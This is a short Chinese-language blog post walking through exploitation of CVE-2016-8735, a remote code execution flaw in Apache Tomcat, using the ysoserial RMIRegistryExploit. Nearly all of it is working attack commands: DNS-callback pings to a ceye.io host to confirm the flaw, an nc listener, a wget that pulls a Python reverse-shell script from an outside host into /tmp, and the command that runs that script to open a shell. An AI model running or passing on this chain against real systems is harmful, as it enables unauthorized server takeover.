MENU

CVE-2016-8735 Apache Tomcat Remote Code Execution

December 3, 2016 • Security

构造命令

Win ping一次命令:

ping -n 1 qjkpla.ceye.io

Linux ping 一次命令:

ping -c 1 qjkpla.ceye.io

利用Ceye回显看是否存在漏洞:

java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit 漏洞IP 端口 Groovy1 "ping -c Groovy1.test.qjkpla.ceye.io"

poc1.png

DNS回显能返回数据,说明执行了Ping命令,也就是说漏洞存在

poc2.png

直接NC监听服务:

nc -l -vv 12555

poc3.png

然后构造命令:下载我们的反弹脚本:(之前用bash命令反弹没有成功所以使用Python脚本进行反弹)

java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit 漏洞IP 端口 Groovy1 "wget http://rinige.com/back.py -O /tmp/x.py"

执行完此命令继续构造命令,去执行刚在wget的脚本

java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit 漏洞IP 端口Groovy1 "python /tmp/x.py 反弹主机地址 反弹端口"

poc4.png

成功反弹:

poc5.png

poc6.png

最后编辑于: December 4, 2016 16:17
Archives QR Code
QR Code for this page
Tipping QR Code